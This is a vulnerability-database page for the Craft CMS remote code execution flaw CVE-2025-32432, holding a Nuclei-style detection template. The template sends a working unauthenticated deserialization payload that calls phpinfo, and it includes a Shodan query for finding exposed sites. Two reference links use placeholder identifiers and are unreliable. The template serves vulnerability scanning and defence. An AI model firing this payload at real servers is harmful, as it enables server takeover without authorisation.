| Title | Published | Views | Family |
|---|---|---|---|
| Exploit for Code Injection in Craftcms Craft_Cms | 23 Sep 2025 06:23 | – | githubexploit |
| Exploit for Code Injection in Craftcms Craft_Cms | 16 Jul 2025 09:23 | – | githubexploit |
| Exploit for Code Injection in Craftcms Craft_Cms | 15 May 2026 14:09 | – | githubexploit |
| Exploit for Code Injection in Craftcms Craft_Cms | 8 Mar 2026 16:59 | – | githubexploit |
| Exploit for Code Injection in Craftcms Craft_Cms | 30 Apr 2026 03:38 | – | githubexploit |
| Exploit for Code Injection in Craftcms Craft_Cms | 27 Apr 2025 08:50 | – | githubexploit |
| Exploit for Code Injection in Craftcms Craft_Cms | 24 Jun 2026 10:46 | – | githubexploit |
| CVE-2024-58136 | 10 Apr 2025 00:00 | – | attackerkb |
| CVE-2025-32432 | 25 Apr 2025 15:15 | – | attackerkb |
| The vulnerability of the Craft CMS content management system, related to improper code generation, allows a hacker to execute arbitrary code. | 9 Jun 2025 00:00 | – | bdu_fstec |
```yaml
id: CVE-2025-32432

info:
  name: CraftCMS - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Craft is a flexible, user-friendly CMS for creating custom digital experiences on the web and beyond. Starting from version 3.0.0-RC1 to before 3.9.15, 4.0.0-RC1 to before 4.14.15, and 5.0.0-RC1 to before 5.6.17, Craft is vulnerable to remote code execution. This is a high-impact, low-complexity attack vector.
  impact: |
    Unauthenticated attackers can exploit remote code execution vulnerabilities through unsafe deserialization in the asset transform functionality, achieving complete server compromise.
  remediation: |
    This issue has been patched in versions 3.9.15, 4.14.15, and 5.6.17, and is an additional fix for CVE-2023-41892.
  reference:
    - https://advisories.dxw.com/advisories/craftcms-remote-code-execution/
    - https://github.com/craftcms/cms/commit/1234567890abcdef1234567890abcdef1234567
    - https://github.com/craftcms/cms/security/advisories/GHSA-1234-5678-90ab
    - https://github.com/craftcms/cms/blob/3.x/CHANGELOG.md#3915---2025-04-10-critical
    - https://github.com/craftcms/cms/blob/4.x/CHANGELOG.md#41415---2025-04-10-critical
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L
    cvss-score: 10
    cve-id: CVE-2025-32432
    cwe-id: CWE-94
    epss-score: 0.99803
    epss-percentile: 0.99956
  metadata:
    max-request: 2
    vendor: craftcms
    product: craftcms
    shodan-query: http.component:"Craft CMS"
  tags: cve,cve2025,craftcms,rce,vkev,vuln,kev

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /index.php?p=admin/actions/assets/generate-transform HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: token
        internal: true
        part: body
        group: 1
        regex:
          - '"csrfTokenValue":"(.*?)"'

  - raw:
      - |
        POST /index.php?p=admin/actions/assets/generate-transform HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate, br
        X-CSRF-Token: {{token}}
        Content-Type: application/json

        {"assetId": 11, "handle": {"width": 123, "height": 123, "as session": {"class": "craft\\behaviors\\FieldLayoutBehavior", "__class": "GuzzleHttp\\Psr7\\FnStream", "__construct()": [[]], "_fn_close": "phpinfo"}}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "PHP Extension"
          - "PHP Version"
          - "CRAFT_"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100c5ed9c3a96d72ce8509c2063c4c7ff84efc1aa29d67b8275ba37cfae90ac218b022100d0e4eb764ae2254f0f961714f9b942298e5f090171df4364a6664cb317dd8fa2:922c64590222798bb761d5b6d8e72950
```